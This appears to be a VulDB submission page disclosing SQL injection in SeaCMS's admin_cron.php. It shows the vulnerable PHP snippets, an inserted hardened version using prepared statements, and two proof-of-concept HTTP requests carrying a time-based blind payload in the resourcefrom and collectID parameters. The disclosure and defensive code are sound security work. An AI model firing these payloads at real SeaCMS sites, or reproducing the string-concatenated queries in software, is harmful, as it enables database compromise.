| Title | SeaCMS v13.3.20250820 SQL Injection |
|---|
| Description | # Summary
SeaCMS v13.3.20250820 contains multiple SQL injection vulnerabilities in the admin panel's cron task management module (admin_cron.php).
# Details
## Root Causes
- Direct SQL concatenation: user input is embedded directly in SQL query strings without parameterization.
- Insufficient sanitization: dhtmlspecialchars() only escapes HTML metacharacters, not SQL.
- Multiple injection points: several parameters handled by the same endpoint are affected.
## Injection Point 1 (resourcefrom)
```
// In PlanMode=0 block:
$rfromarr = explode('#', $_POST['resourcefrom']); // Unsanitized
$rid = $rfromarr[0];
$url = $rfromarr[1];
$dsql->ExecuteNoneQuery("INSERT ... VALUES('$rid', '$url')"); // Direct concatenation
```
## Injection Point 2 (collectID)
```
// In PlanMode=4 block:
$filename = "autocollectnews.php#".$_POST['collectID']."#...";
$dsql->ExecuteNoneQuery("INSERT ... VALUES('$filename')"); // No sanitization
```
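As an added defensive illustration (not SeaCMS code, and not the author's PoC), the same two code paths rewritten so that the values from resourcefrom and collectID are validated and then bound as prepared-statement parameters instead of concatenated into the SQL text; the table and column names, the PDO connection and the helper names are assumptions:

```php
<?php
// Added example, not SeaCMS code: hardened handling of the two injection points
// from the report. Table/column names and the PDO connection are assumptions.
function parseResourceFrom(string $raw): array
{
    // Expected form "<id>#<url>"; reject anything else instead of splitting blindly.
    $parts = explode('#', $raw, 2);
    if (count($parts) !== 2) {
        throw new InvalidArgumentException('resourcefrom must be "<id>#<url>"');
    }
    [$rid, $url] = $parts;
    if (!ctype_digit($rid)) {
        throw new InvalidArgumentException('resource id must be numeric');
    }
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        throw new InvalidArgumentException('resource url is not a valid URL');
    }
    return ['rid' => (int) $rid, 'url' => $url];
}
function addCron(PDO $db, array $post): void
{
    $mode = (int) ($post['PlanMode'] ?? -1);
    if ($mode === 0) {
        $r = parseResourceFrom((string) ($post['resourcefrom'] ?? ''));
        // Values travel as bound parameters, never inside the SQL string.
        $stmt = $db->prepare('INSERT INTO sea_cron (rid, url) VALUES (:rid, :url)');
        $stmt->execute([':rid' => $r['rid'], ':url' => $r['url']]);
    } elseif ($mode === 4) {
        $collectId = (string) ($post['collectID'] ?? '');
        if (!ctype_digit($collectId)) {
            throw new InvalidArgumentException('collectID must be numeric');
        }
        $filename = 'autocollectnews.php#' . $collectId;
        $stmt = $db->prepare('INSERT INTO sea_cron (filename) VALUES (:filename)');
        $stmt->execute([':filename' => $filename]);
    } else {
        throw new InvalidArgumentException('unsupported PlanMode');
    }
}
// Constructed demo: the payload from PoC #1 is rejected before any SQL is built.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE sea_cron (id INTEGER PRIMARY KEY, rid INTEGER, url TEXT, filename TEXT)');
try {
    addCron($db, ['PlanMode' => '0', 'resourcefrom' => "00'XOR(0*if(now()=sysdate(),sleep(4),0))XOR'Z"]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
addCron($db, ['PlanMode' => '0', 'resourcefrom' => '12#https://example.com/feed']);
echo 'rows stored: ', $db->query('SELECT COUNT(*) FROM sea_cron')->fetchColumn(), PHP_EOL;
```

Even with the validation removed, the bound parameters alone would keep the quote in the payload from closing the SQL literal; the input checks are there so malformed task definitions are rejected and logged rather than stored.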
# POC
## PoC #1: Time-Based Blind via resourcefrom
```
POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Cookie: [Admin Cookie]

PlanMode=0&resourcefrom=00'XOR(0*if(now()=sysdate(),sleep(4),0))XOR'Z&...[other params]
```
Effect: the response is delayed by about 4 seconds when the injected expression is evaluated, since now()=sysdate() is true.
## PoC #2: Time-Based Blind via collectID (Multipart)
```
POST /[admins'URL]/admin_cron.php?action=addCron HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=----boundary

----boundary
Content-Disposition: form-data; name="collectID"

00'XOR(0*if(now()=sysdate(),sleep(4),0))XOR'Z
----boundary--
``` |
|---|
| Source | https://github.com/Hebing123/cve/issues/93 |
|---|
| User | jiashenghe (UID 39445) |
|---|
| Submission | 22.09.2025 12:22 (7 months ago) |
|---|
| Moderation | 26.09.2025 14:44 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 326112 [SeaCMS 13.3.20250820 Cron Task Management /admin_cron.php resourcefrom/collectID SQL Injection] |
|---|
| Points | 20 |
|---|